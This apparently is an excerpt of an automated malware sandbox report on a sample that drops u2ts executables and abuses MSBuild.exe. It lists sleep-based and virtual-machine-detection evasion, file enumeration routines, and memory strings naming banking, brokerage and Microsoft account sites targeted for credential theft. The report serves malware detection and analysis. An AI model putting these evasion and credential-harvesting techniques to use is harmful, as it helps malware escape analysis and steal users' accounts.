Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -53347s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -36423s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -40238s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -47963s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -30339s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -36388s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -34666s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -53467s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -38120s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -35343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -54129s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -35309s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -34492s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -44719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49642s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -35996s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -50222s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -52005s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -36184s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -50385s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -42138s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -40532s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -52225s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -53819s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -41500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -51726s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -34731s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -48714s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -50658s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49494s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32649s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -44342s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -45027s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -30663s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -59755s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -37315s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -50777s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32711s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -44204s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -47590s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -42016s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -57105s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -31420s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -55443s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -53246s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -36387s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -30526s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49116s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49257s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -34086s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32936s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -56412s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -52526s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32075s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -50036s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -33728s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -41881s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -46955s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -36684s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8128	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -58111s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -31319s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49340s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7172	Thread sleep time: -922337203685477s >= -30000s

Queries keyboard layouts

Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809			Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0041D8B1 FindFirstFileExA,	0_2_0041D8B1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0368DB18 FindFirstFileExA,	0_2_0368DB18
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004015C0 VirtualProtect,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	2_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	2_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C72261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	3_2_6C72261E

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_00401120 GetSystemInfo,ExitProcess,

2_2_00401120

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35511
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48864
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32845
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30442
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36423
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47963
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30339
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34666
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54129
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49642
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35996
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50222
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52225
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34731
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32649
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44342
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45027
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37315
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50777
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57105
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49116
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32936
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32075
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41881
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58111
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp\u2ts.2	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000002.2424148242.0000000001D9F000.00000004.00000020.00020000.00000000.sdmp, sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001D2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Aapi.dllHyper-V RAW
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
